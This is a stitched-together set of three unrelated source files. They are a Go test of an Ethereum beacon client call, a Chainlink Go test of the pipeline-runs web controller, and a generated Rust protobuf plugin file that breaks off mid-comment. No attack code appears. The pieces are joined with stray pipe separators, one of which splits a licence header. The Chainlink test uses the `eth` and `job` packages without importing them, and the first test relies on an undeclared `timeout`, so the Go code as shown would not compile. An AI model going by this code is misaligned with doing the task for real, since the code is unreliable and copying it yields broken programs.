targetaggregatorspercommittee_test.go | // Copyright © 2020 Attestant Limited.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0 | // Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package prysmgrpc_test
import (
"context"
"os"
"testing"
"github.com/attestantio/go-eth2-client/prysmgrpc"
"github.com/stretchr/testify/require"
)
func TestTargetAggregatorsPerCommittee(t *testing.T) {
tests := []struct {
name string
}{
{
name: "Good",
},
}
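// Note: `timeout` is assumed to be defined elsewhere in this test package
// (e.g. in shared test setup); it is not declared in this file.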
service, err := prysmgrpc.New(context.Background(),
prysmgrpc.WithAddress(os.Getenv("PRYSMGRPC_ADDRESS")),
prysmgrpc.WithTimeout(timeout),
)
require.NoError(t, err)
for _, test := range tests {
t.Run(test.name, func(t *testing.T) {
targetAggregatorsPerCommittee, err := service.TargetAggregatorsPerCommittee(context.Background())
require.NoError(t, err)
require.NotNil(t, targetAggregatorsPerCommittee)
})
}
} | // |
pipeline_runs_controller_test.go | package web_test
import (
"context"
"fmt"
"net/http"
"testing"
|
"github.com/pelletier/go-toml"
"github.com/smartcontractkit/chainlink/core/internal/cltest"
"github.com/smartcontractkit/chainlink/core/services/pipeline"
"github.com/smartcontractkit/chainlink/core/web"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"gopkg.in/guregu/null.v4"
)
func TestPipelineRunsController_Create_HappyPath(t *testing.T) {
t.Parallel()
rpcClient, gethClient, _, assertMocksCalled := cltest.NewEthMocksWithStartupAssertions(t)
defer assertMocksCalled()
app, cleanup := cltest.NewApplication(t,
eth.NewClientWith(rpcClient, gethClient),
)
defer cleanup()
require.NoError(t, app.Start())
key := cltest.MustInsertRandomKey(t, app.Store.DB)
_, bridge := cltest.NewBridgeType(t, "voter_turnout", "blah")
require.NoError(t, app.Store.DB.Create(bridge).Error)
_, bridge2 := cltest.NewBridgeType(t, "election_winner", "blah")
require.NoError(t, app.Store.DB.Create(bridge2).Error)
client := app.NewHTTPClient()
var ocrJobSpecFromFile job.SpecDB
tree, err := toml.LoadFile("testdata/oracle-spec.toml")
require.NoError(t, err)
err = tree.Unmarshal(&ocrJobSpecFromFile)
require.NoError(t, err)
var ocrSpec job.OffchainReportingOracleSpec
err = tree.Unmarshal(&ocrSpec)
require.NoError(t, err)
ocrJobSpecFromFile.OffchainreportingOracleSpec = &ocrSpec
ocrJobSpecFromFile.OffchainreportingOracleSpec.TransmitterAddress = &key.Address
jobID, _ := app.AddJobV2(context.Background(), ocrJobSpecFromFile, null.String{})
response, cleanup := client.Post("/v2/jobs/"+fmt.Sprintf("%v", jobID)+"/runs", nil)
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
parsedResponse := job.PipelineRun{}
err = web.ParseJSONAPIResponse(cltest.ParseResponseBody(t, response), &parsedResponse)
assert.NoError(t, err)
assert.NotNil(t, parsedResponse.ID)
}
func TestPipelineRunsController_Index_HappyPath(t *testing.T) {
client, jobID, runIDs, cleanup := setupPipelineRunsControllerTests(t)
defer cleanup()
response, cleanup := client.Get("/v2/jobs/" + fmt.Sprintf("%v", jobID) + "/runs")
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
var parsedResponse []pipeline.Run
responseBytes := cltest.ParseResponseBody(t, response)
assert.Contains(t, string(responseBytes), `"meta":null,"errors":[null],"outputs":["3"]`)
err := web.ParseJSONAPIResponse(responseBytes, &parsedResponse)
assert.NoError(t, err)
require.Len(t, parsedResponse, 2)
assert.Equal(t, parsedResponse[1].ID, runIDs[0])
assert.NotNil(t, parsedResponse[1].CreatedAt)
assert.NotNil(t, parsedResponse[1].FinishedAt)
require.Len(t, parsedResponse[1].PipelineTaskRuns, 4)
}
func TestPipelineRunsController_Index_Pagination(t *testing.T) {
client, jobID, runIDs, cleanup := setupPipelineRunsControllerTests(t)
defer cleanup()
response, cleanup := client.Get("/v2/jobs/" + fmt.Sprintf("%v", jobID) + "/runs?page=1&size=1")
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
var parsedResponse []pipeline.Run
responseBytes := cltest.ParseResponseBody(t, response)
assert.Contains(t, string(responseBytes), `"meta":null,"errors":[null],"outputs":["3"]`)
assert.Contains(t, string(responseBytes), `"meta":{"count":2}`)
err := web.ParseJSONAPIResponse(responseBytes, &parsedResponse)
assert.NoError(t, err)
require.Len(t, parsedResponse, 1)
assert.Equal(t, parsedResponse[0].ID, runIDs[1])
assert.NotNil(t, parsedResponse[0].CreatedAt)
assert.NotNil(t, parsedResponse[0].FinishedAt)
require.Len(t, parsedResponse[0].PipelineTaskRuns, 4)
}
func TestPipelineRunsController_Show_HappyPath(t *testing.T) {
client, jobID, runIDs, cleanup := setupPipelineRunsControllerTests(t)
defer cleanup()
response, cleanup := client.Get("/v2/jobs/" + fmt.Sprintf("%v", jobID) + "/runs/" + fmt.Sprintf("%v", runIDs[0]))
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
var parsedResponse pipeline.Run
responseBytes := cltest.ParseResponseBody(t, response)
assert.Contains(t, string(responseBytes), `"meta":null,"errors":[null],"outputs":["3"]`)
err := web.ParseJSONAPIResponse(responseBytes, &parsedResponse)
assert.NoError(t, err)
assert.Equal(t, parsedResponse.ID, runIDs[0])
assert.NotNil(t, parsedResponse.CreatedAt)
assert.NotNil(t, parsedResponse.FinishedAt)
require.Len(t, parsedResponse.PipelineTaskRuns, 4)
}
func TestPipelineRunsController_ShowRun_InvalidID(t *testing.T) {
t.Parallel()
rpcClient, gethClient, _, assertMocksCalled := cltest.NewEthMocksWithStartupAssertions(t)
defer assertMocksCalled()
app, cleanup := cltest.NewApplication(t,
eth.NewClientWith(rpcClient, gethClient),
)
defer cleanup()
require.NoError(t, app.Start())
client := app.NewHTTPClient()
response, cleanup := client.Get("/v2/jobs/1/runs/invalid-run-ID")
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusUnprocessableEntity)
}
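// setupPipelineRunsControllerTests starts a test application backed by mocked eth clients
// and an HTTP mock server, creates an offchain reporting job whose pipeline multiplies the
// mocked price by 3, runs the job twice, waits for both runs to finish, and returns the
// HTTP client, the job ID, the two run IDs, and a combined cleanup function.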
func setupPipelineRunsControllerTests(t *testing.T) (cltest.HTTPClientCleaner, int32, []int64, func()) {
t.Parallel()
rpcClient, gethClient, _, assertMocksCalled := cltest.NewEthMocksWithStartupAssertions(t)
defer assertMocksCalled()
app, cleanup := cltest.NewApplication(t,
eth.NewClientWith(rpcClient, gethClient),
)
require.NoError(t, app.Start())
client := app.NewHTTPClient()
mockHTTP, cleanupHTTP := cltest.NewHTTPMockServer(t, http.StatusOK, "GET", `{"USD": 1}`)
key := cltest.MustInsertRandomKey(t, app.Store.DB)
sp := fmt.Sprintf(`
type = "offchainreporting"
schemaVersion = 1
contractAddress = "%s"
p2pPeerID = "%s"
p2pBootstrapPeers = [
"/dns4/chain.link/tcp/1234/p2p/16Uiu2HAm58SP7UL8zsnpeuwHfytLocaqgnyaYKP8wu7qRdrixLju",
]
keyBundleID = "%s"
transmitterAddress = "%s"
observationSource = """
// data source 1
ds [type=http method=GET url="%s"];
ds_parse [type=jsonparse path="USD"];
ds_multiply [type=multiply times=3];
ds -> ds_parse -> ds_multiply -> answer;
answer [type=median index=0];
"""
`, cltest.NewAddress().Hex(), cltest.DefaultP2PPeerID, cltest.DefaultOCRKeyBundleID, key.Address.Hex(), mockHTTP.URL)
var ocrJobSpec job.SpecDB
err := toml.Unmarshal([]byte(sp), &ocrJobSpec)
require.NoError(t, err)
var os job.OffchainReportingOracleSpec
err = toml.Unmarshal([]byte(sp), &os)
require.NoError(t, err)
ocrJobSpec.OffchainreportingOracleSpec = &os
err = app.Store.OCRKeyStore.Unlock(cltest.Password)
require.NoError(t, err)
jobID, err := app.AddJobV2(context.Background(), ocrJobSpec, null.String{})
require.NoError(t, err)
firstRunID, err := app.RunJobV2(context.Background(), jobID, nil)
require.NoError(t, err)
secondRunID, err := app.RunJobV2(context.Background(), jobID, nil)
require.NoError(t, err)
err = app.AwaitRun(context.Background(), firstRunID)
require.NoError(t, err)
err = app.AwaitRun(context.Background(), secondRunID)
require.NoError(t, err)
return client, jobID, []int64{firstRunID, secondRunID}, func() {
cleanup()
cleanupHTTP()
}
}
plugin.rs | // This file is generated by rust-protobuf 3.0.0-pre. Do not edit
// .proto file is parsed by protoc --rust-out=...
// @generated
// https://github.com/rust-lang/rust-clippy/issues/702
#![allow(unknown_lints)]
#![allow(clippy::all)]
#![allow(unused_attributes)]
#![rustfmt::skip]
#![allow(box_pointers)]
#![allow(dead_code)]
#![allow(missing_docs)]
#![allow(non_camel_case_types)]
#![allow(non_snake_case)]
#![allow(non_upper_case_globals)]
#![allow(trivial_casts)]
#![allow(unused_results)]
#![allow(unused_mut)]
//! Generated file from `google/protobuf/compiler/plugin.proto`
/// The version number of protocol compiler.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct Version {
// message fields
major: ::std::option::Option<i32>,
minor: ::std::option::Option<i32>,
patch: ::std::option::Option<i32>,
/// A suffix for alpha, beta or rc release, e.g., "alpha-1", "rc2". It should
/// be empty for mainline stable releases.
suffix: ::std::option::Option<::std::string::String>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a Version {
fn default() -> &'a Version {
<Version as crate::Message>::default_instance()
}
}
impl Version {
pub fn new() -> Version {
::std::default::Default::default()
}
// optional int32 major = 1;
pub fn get_major(&self) -> i32 {
self.major.unwrap_or(0)
}
pub fn clear_major(&mut self) {
self.major = ::std::option::Option::None;
}
pub fn has_major(&self) -> bool {
self.major.is_some()
}
// Param is passed by value, moved
pub fn set_major(&mut self, v: i32) {
self.major = ::std::option::Option::Some(v);
}
// optional int32 minor = 2;
pub fn get_minor(&self) -> i32 {
self.minor.unwrap_or(0)
}
pub fn clear_minor(&mut self) {
self.minor = ::std::option::Option::None;
}
pub fn has_minor(&self) -> bool {
self.minor.is_some()
}
// Param is passed by value, moved
pub fn set_minor(&mut self, v: i32) {
self.minor = ::std::option::Option::Some(v);
}
// optional int32 patch = 3;
pub fn get_patch(&self) -> i32 {
self.patch.unwrap_or(0)
}
pub fn clear_patch(&mut self) {
self.patch = ::std::option::Option::None;
}
pub fn has_patch(&self) -> bool {
self.patch.is_some()
}
// Param is passed by value, moved
pub fn set_patch(&mut self, v: i32) {
self.patch = ::std::option::Option::Some(v);
}
// optional string suffix = 4;
pub fn get_suffix(&self) -> &str {
match self.suffix.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_suffix(&mut self) {
self.suffix = ::std::option::Option::None;
}
pub fn has_suffix(&self) -> bool {
self.suffix.is_some()
}
// Param is passed by value, moved
pub fn set_suffix(&mut self, v: ::std::string::String) {
self.suffix = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_suffix(&mut self) -> &mut ::std::string::String {
if self.suffix.is_none() {
self.suffix = ::std::option::Option::Some(::std::string::String::new());
}
self.suffix.as_mut().unwrap()
}
// Take field
pub fn take_suffix(&mut self) -> ::std::string::String {
self.suffix.take().unwrap_or_else(|| ::std::string::String::new())
}
fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"major",
|m: &Version| { &m.major },
|m: &mut Version| { &mut m.major },
Version::get_major,
));
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"minor",
|m: &Version| { &m.minor },
|m: &mut Version| { &mut m.minor },
Version::get_minor,
));
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"patch",
|m: &Version| { &m.patch },
|m: &mut Version| { &mut m.patch },
Version::get_patch,
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"suffix",
|m: &Version| { &m.suffix },
|m: &mut Version| { &mut m.suffix },
Version::get_suffix,
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<Version>(
"Version",
0,
fields,
)
}
}
impl crate::Message for Version {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.major = ::std::option::Option::Some(is.read_int32()?);
},
2 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.minor = ::std::option::Option::Some(is.read_int32()?);
},
3 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.patch = ::std::option::Option::Some(is.read_int32()?);
},
4 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.suffix = ::std::option::Option::Some(is.read_string()?);
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if let Some(v) = self.major {
my_size += crate::rt::value_size(1, v, crate::wire_format::WireTypeVarint);
}
if let Some(v) = self.minor {
my_size += crate::rt::value_size(2, v, crate::wire_format::WireTypeVarint);
}
if let Some(v) = self.patch {
my_size += crate::rt::value_size(3, v, crate::wire_format::WireTypeVarint);
}
if let Some(v) = self.suffix.as_ref() {
my_size += crate::rt::string_size(4, &v);
}
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
if let Some(v) = self.major {
os.write_int32(1, v)?;
}
if let Some(v) = self.minor {
os.write_int32(2, v)?;
}
if let Some(v) = self.patch {
os.write_int32(3, v)?;
}
if let Some(v) = self.suffix.as_ref() {
os.write_string(4, v)?;
}
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> Version {
Version::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(file_descriptor(), 0)
}
fn default_instance() -> &'static Version {
static instance: Version = Version {
major: ::std::option::Option::None,
minor: ::std::option::Option::None,
patch: ::std::option::Option::None,
suffix: ::std::option::Option::None,
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for Version {
fn clear(&mut self) {
self.major = ::std::option::Option::None;
self.minor = ::std::option::Option::None;
self.patch = ::std::option::Option::None;
self.suffix = ::std::option::Option::None;
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for Version {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for Version {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// An encoded CodeGeneratorRequest is written to the plugin's stdin.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct CodeGeneratorRequest {
// message fields
/// The .proto files that were explicitly listed on the command-line. The
/// code generator should generate code only for these files. Each file's
/// descriptor will be included in proto_file, below.
pub file_to_generate: ::std::vec::Vec<::std::string::String>,
/// The generator parameter passed on the command-line.
parameter: ::std::option::Option<::std::string::String>,
/// FileDescriptorProtos for all files in files_to_generate and everything
/// they import. The files will appear in topological order, so each file
/// appears before any file that imports it.
///
/// protoc guarantees that all proto_files will be written after
/// the fields above, even though this is not technically guaranteed by the
/// protobuf wire format. This theoretically could allow a plugin to stream
/// in the FileDescriptorProtos and handle them one by one rather than read
/// the entire set into memory at once. However, as of this writing, this
/// is not similarly optimized on protoc's end -- it will store all fields in
/// memory at once before sending them to the plugin.
///
/// Type names of fields and extensions in the FileDescriptorProto are always
/// fully qualified.
pub proto_file: ::std::vec::Vec<crate::descriptor::FileDescriptorProto>,
/// The version number of protocol compiler.
pub compiler_version: crate::MessageField<Version>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a CodeGeneratorRequest {
fn default() -> &'a CodeGeneratorRequest {
<CodeGeneratorRequest as crate::Message>::default_instance()
}
}
impl CodeGeneratorRequest {
pub fn new() -> CodeGeneratorRequest {
::std::default::Default::default()
}
// optional string parameter = 2;
pub fn get_parameter(&self) -> &str {
match self.parameter.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_parameter(&mut self) {
self.parameter = ::std::option::Option::None;
}
pub fn has_parameter(&self) -> bool {
self.parameter.is_some()
}
// Param is passed by value, moved
pub fn set_parameter(&mut self, v: ::std::string::String) {
self.parameter = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_parameter(&mut self) -> &mut ::std::string::String {
if self.parameter.is_none() {
self.parameter = ::std::option::Option::Some(::std::string::String::new());
}
self.parameter.as_mut().unwrap()
}
// Take field
pub fn take_parameter(&mut self) -> ::std::string::String {
self.parameter.take().unwrap_or_else(|| ::std::string::String::new())
}
fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_vec_simpler_accessor::<_, _>(
"file_to_generate",
|m: &CodeGeneratorRequest| { &m.file_to_generate },
|m: &mut CodeGeneratorRequest| { &mut m.file_to_generate },
));
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"parameter",
|m: &CodeGeneratorRequest| { &m.parameter },
|m: &mut CodeGeneratorRequest| { &mut m.parameter },
CodeGeneratorRequest::get_parameter,
));
fields.push(crate::reflect::rt::v2::make_vec_simpler_accessor::<_, _>(
"proto_file",
|m: &CodeGeneratorRequest| { &m.proto_file },
|m: &mut CodeGeneratorRequest| { &mut m.proto_file },
));
fields.push(crate::reflect::rt::v2::make_message_field_accessor::<_, Version>(
"compiler_version",
|m: &CodeGeneratorRequest| { &m.compiler_version },
|m: &mut CodeGeneratorRequest| { &mut m.compiler_version },
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<CodeGeneratorRequest>(
"CodeGeneratorRequest",
1,
fields,
)
}
}
impl crate::Message for CodeGeneratorRequest {
fn is_initialized(&self) -> bool {
for v in &self.proto_file {
if !v.is_initialized() {
return false;
}
};
for v in &self.compiler_version {
if !v.is_initialized() {
return false;
}
};
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
crate::rt::read_repeated_string_into(wire_type, is, &mut self.file_to_generate)?;
},
2 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.parameter = ::std::option::Option::Some(is.read_string()?);
},
15 => {
crate::rt::read_repeated_message_into_vec(wire_type, is, &mut self.proto_file)?;
},
3 => {
crate::rt::read_singular_message_into_field(wire_type, is, &mut self.compiler_version)?;
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in &self.file_to_generate {
my_size += crate::rt::string_size(1, &value);
};
if let Some(v) = self.parameter.as_ref() {
my_size += crate::rt::string_size(2, &v);
}
for value in &self.proto_file {
let len = value.compute_size();
my_size += 1 + crate::rt::compute_raw_varint32_size(len) + len;
};
if let Some(v) = self.compiler_version.as_ref() {
let len = v.compute_size();
my_size += 1 + crate::rt::compute_raw_varint32_size(len) + len;
}
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
for v in &self.file_to_generate {
os.write_string(1, &v)?;
};
if let Some(v) = self.parameter.as_ref() {
os.write_string(2, v)?;
}
for v in &self.proto_file {
crate::rt::write_message_field_with_cached_size(15, v, os)?;
};
if let Some(v) = self.compiler_version.as_ref() {
crate::rt::write_message_field_with_cached_size(3, v, os)?;
}
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> CodeGeneratorRequest {
CodeGeneratorRequest::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(file_descriptor(), 1)
}
fn default_instance() -> &'static CodeGeneratorRequest {
static instance: CodeGeneratorRequest = CodeGeneratorRequest {
file_to_generate: ::std::vec::Vec::new(),
parameter: ::std::option::Option::None,
proto_file: ::std::vec::Vec::new(),
compiler_version: crate::MessageField::none(),
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for CodeGeneratorRequest {
fn clear(&mut self) {
self.file_to_generate.clear();
self.parameter = ::std::option::Option::None;
self.proto_file.clear();
self.compiler_version.clear();
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for CodeGeneratorRequest {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for CodeGeneratorRequest {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// The plugin writes an encoded CodeGeneratorResponse to stdout.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct CodeGeneratorResponse {
// message fields
/// Error message. If non-empty, code generation failed. The plugin process
/// should exit with status code zero even if it reports an error in this way.
///
/// This should be used to indicate errors in .proto files which prevent the
/// code generator from generating correct code. Errors which indicate a
/// problem in protoc itself -- such as the input CodeGeneratorRequest being
/// unparseable -- should be reported by writing a message to stderr and
/// exiting with a non-zero status code.
error: ::std::option::Option<::std::string::String>,
/// A bitmask of supported features that the code generator supports.
/// This is a bitwise "or" of values from the Feature enum.
supported_features: ::std::option::Option<u64>,
pub file: ::std::vec::Vec<code_generator_response::File>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a CodeGeneratorResponse {
fn default() -> &'a CodeGeneratorResponse {
<CodeGeneratorResponse as crate::Message>::default_instance()
}
}
impl CodeGeneratorResponse {
pub fn new() -> CodeGeneratorResponse {
::std::default::Default::default()
}
// optional string error = 1;
pub fn get_error(&self) -> &str {
match self.error.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_error(&mut self) {
self.error = ::std::option::Option::None;
}
pub fn has_error(&self) -> bool {
self.error.is_some()
}
// Param is passed by value, moved
pub fn set_error(&mut self, v: ::std::string::String) {
self.error = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_error(&mut self) -> &mut ::std::string::String {
if self.error.is_none() {
self.error = ::std::option::Option::Some(::std::string::String::new());
}
self.error.as_mut().unwrap()
}
// Take field
pub fn take_error(&mut self) -> ::std::string::String {
self.error.take().unwrap_or_else(|| ::std::string::String::new())
}
// optional uint64 supported_features = 2;
pub fn get_supported_features(&self) -> u64 {
self.supported_features.unwrap_or(0)
}
pub fn clear_supported_features(&mut self) {
self.supported_features = ::std::option::Option::None;
}
pub fn has_supported_features(&self) -> bool {
self.supported_features.is_some()
}
// Param is passed by value, moved
pub fn set_supported_features(&mut self, v: u64) {
self.supported_features = ::std::option::Option::Some(v);
}
fn generated_message_descriptor_data() -> crate::reflect::GeneratedMessageDescriptorData {
let mut fields = ::std::vec::Vec::new();
fields.push(crate::reflect::rt::v2::make_option_get_ref_simpler_accessor::<_, _>(
"error",
|m: &CodeGeneratorResponse| { &m.error },
|m: &mut CodeGeneratorResponse| { &mut m.error },
CodeGeneratorResponse::get_error,
));
fields.push(crate::reflect::rt::v2::make_option_get_copy_simpler_accessor::<_, _>(
"supported_features",
|m: &CodeGeneratorResponse| { &m.supported_features },
|m: &mut CodeGeneratorResponse| { &mut m.supported_features },
CodeGeneratorResponse::get_supported_features,
));
fields.push(crate::reflect::rt::v2::make_vec_simpler_accessor::<_, _>(
"file",
|m: &CodeGeneratorResponse| { &m.file },
|m: &mut CodeGeneratorResponse| { &mut m.file },
));
crate::reflect::GeneratedMessageDescriptorData::new_2::<CodeGeneratorResponse>(
"CodeGeneratorResponse",
2,
fields,
)
}
}
impl crate::Message for CodeGeneratorResponse {
fn is_initialized(&self) -> bool {
for v in &self.file {
if !v.is_initialized() {
return false;
}
};
true
}
fn merge_from(&mut self, is: &mut crate::CodedInputStream<'_>) -> crate::ProtobufResult<()> {
while !is.eof()? {
let (field_number, wire_type) = is.read_tag_unpack()?;
match field_number {
1 => {
if wire_type != crate::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.error = ::std::option::Option::Some(is.read_string()?);
},
2 => {
if wire_type != crate::wire_format::WireTypeVarint {
return ::std::result::Result::Err(crate::rt::unexpected_wire_type(wire_type));
}
self.supported_features = ::std::option::Option::Some(is.read_uint64()?);
},
15 => {
crate::rt::read_repeated_message_into_vec(wire_type, is, &mut self.file)?;
},
_ => {
crate::rt::read_unknown_or_skip_group(field_number, wire_type, is, self.mut_unknown_fields())?;
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if let Some(v) = self.error.as_ref() {
my_size += crate::rt::string_size(1, &v);
}
if let Some(v) = self.supported_features {
my_size += crate::rt::value_size(2, v, crate::wire_format::WireTypeVarint);
}
for value in &self.file {
let len = value.compute_size();
my_size += 1 + crate::rt::compute_raw_varint32_size(len) + len;
};
my_size += crate::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut crate::CodedOutputStream<'_>) -> crate::ProtobufResult<()> {
if let Some(v) = self.error.as_ref() {
os.write_string(1, v)?;
}
if let Some(v) = self.supported_features {
os.write_uint64(2, v)?;
}
for v in &self.file {
crate::rt::write_message_field_with_cached_size(15, v, os)?;
};
os.write_unknown_fields(self.get_unknown_fields())?;
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields(&self) -> &crate::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields(&mut self) -> &mut crate::UnknownFields {
&mut self.unknown_fields
}
fn new() -> CodeGeneratorResponse {
CodeGeneratorResponse::new()
}
fn descriptor_static() -> crate::reflect::MessageDescriptor {
crate::reflect::MessageDescriptor::new_generated_2(file_descriptor(), 2)
}
fn default_instance() -> &'static CodeGeneratorResponse {
static instance: CodeGeneratorResponse = CodeGeneratorResponse {
error: ::std::option::Option::None,
supported_features: ::std::option::Option::None,
file: ::std::vec::Vec::new(),
unknown_fields: crate::UnknownFields::new(),
cached_size: crate::rt::CachedSize::new(),
};
&instance
}
}
impl crate::Clear for CodeGeneratorResponse {
fn clear(&mut self) {
self.error = ::std::option::Option::None;
self.supported_features = ::std::option::Option::None;
self.file.clear();
self.unknown_fields.clear();
}
}
impl ::std::fmt::Debug for CodeGeneratorResponse {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
crate::text_format::fmt(self, f)
}
}
impl crate::reflect::ProtobufValue for CodeGeneratorResponse {
type RuntimeType = crate::reflect::runtime_types::RuntimeTypeMessage<Self>;
}
/// Nested message and enums of message `CodeGeneratorResponse`
pub mod code_generator_response {
/// Represents a single generated file.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct File {
// message fields
/// The file name, relative to the output directory. The name must not
/// contain "." or ".." components and must be relative, not be absolute (so,
/// the file cannot lie outside the output directory). "/" must be used as
/// the path separator, not "\".
///
/// If the name is omitted, the content will be appended to the previous
/// file. This allows the generator to break large files into small chunks,
/// and allows the generated text to be streamed back to protoc so that large
/// files need not reside completely in memory at one time. Note that as of
/// this writing protoc does not optimize for this -- it will read the entire
/// CodeGeneratorResponse before writing files to disk.
